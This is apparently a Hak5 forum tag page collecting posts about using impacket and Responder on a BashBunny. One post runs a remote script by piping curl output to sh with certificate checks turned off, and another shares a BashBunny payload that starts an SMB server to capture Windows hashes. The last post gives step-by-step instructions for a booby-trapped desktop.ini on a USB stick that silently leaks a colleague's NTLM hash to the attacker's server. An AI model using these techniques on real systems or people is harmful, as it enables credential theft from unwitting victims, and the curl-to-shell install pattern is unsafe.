Search the Community
Showing results for tags 'impacket'.
Please see the official Hak5 tools sticky It seems like quite a few folks are having some trouble getting impacket and responder installed since the firmware v1.1 update. Here is a dead simple script that you can run on your BashBunny to install the two most commonly used tools in the currently published payloads. Steps Setup your BashBunny to share internet with your host machine, then SSH into the bunny. Ensure it has an internet connection. I prefer a simple ping to 188.8.131.52 Run the following command curl -k https://scripts.10ninetysix.com/bb/git_impacket_responder.txt | sh The content of the script can be viewed below and at the following URL: https://scripts.10ninetysix.com/bb/git_impacket_responder.txt apt-get update && apt-get install -y git mkdir -p /tools export GIT_SSL_NO_VERIFY=1 # Install Responder git clone https://github.com/lgandx/Responder.git /tools/responder # Install Impacket git clone https://github.com/CoreSecurity/impacket.git /tools/impacket cd /tools/impacket && python ./setup.py install Note: I believe Sebkinne is creating, or has created .deb files for impacket and responder that will be easily installed by placing them in the USB storage /tools/ folder, however those have yet to be released. I am guessing they will be released with the 1.2 firmware.
Hi all.. IM trying to wrap my head around everything that can be done with responder and impacket as well as any other tool kits available that would be useful in creating Ethernet attacks.. if anyone can point me to some good nooby tutorials for either that would be awesome.. maybe the next hak YouTube show can cover them? Specifically looking for SMB attacks that can take ntmlv2 hashes.. or ways to inject browser based payloads to locked machines Thanks in advance .
Hello there! I was trying to combine the smbserver.py script from impacket and a ducky script to connect to the smb server automatically (the same script as is used for the rubber ducky apart from it connects to the IP of the Bunny) and pipe the result from the script to a file, which means the windows hashes will be saved in that file and saved to the Bunny, ready for cracking (I think?). However, whenever I try to run it, the Bunny seems to get caught up after running the server and I am assuming this is because the keyboard is still captured by the server, and if I were to add a: QUACK CTRL C after the server has run, it will stop the server (I assume). I used the following code to make sure that it wasn't an issue with my ducky script or anything else in the bunny script: #Run SMB Server and then connect to it in windows with the terminal output saved to a .txt LED B #HID is used to ensure that the ducky script can run (even though only a delay is included here) ATTACKMODE HID RNDIS_ETHERNET source bunny_helpers.sh #File path of the script, piping to file O.txt of same folder /pentest/impacket/examples/smbserver.py tmp /tmp/ >> O.txt #Potential QUACK CTRL C, if it doesn't stop the server QUACK DELAY 500 #Check to make sure that the script continues after running the server LED R #The keyword parsed is always included at the start of the server, which would allow a check to be performed to ensure that the server is #running if grep parsed O.txt then LED R G B else LED R fi And the LED always remains blue, which assured me that it was getting caught at the running of the server. I even added a DELAY 500 to make sure it wasn't just that the grep was being performed before the file was populated. So, I was wondering if anyone has any idea of how to fix this issue? Whether it be use another script that will free the keyboard after running or use a stager payload of some sorts? Or maybe I am just being quite naive and missing something obvious! Any help would be greatly appreciated! Yours Sincerely.
After watching the recent episode of Hak5 (2102) on Youtube, I was wondering if this smb hash grab method can be done without the duck and with a normal USB stick. The answer is YES. Bytewolf @kingbytewolf -= HowTo do it =- Grab any USB-Stick you have laying around Create a Directory Set the System attribute of this directory with attrib +s <dirname> Create a file called desktop.ini in this directory with the following content [.ShellClassInfo] IconResource=\\<YourIP>\tmp\demo.ico IconFile=%SystemRoot%\system32\shell32.dll IconIndex=-235 Save the desktop.ini as Unicode or UTF-8 file Set the attributes archive, hidden and system with attrib +a +h +s desktop.ini Preparation -> Done Put some RFCs in the directory. Fire up the smbserver and give the Stick to your colleague that really needs these RFCs. >:-D When he navigates to the drive you should have the hash delivered to your doorstep without any windows popping up.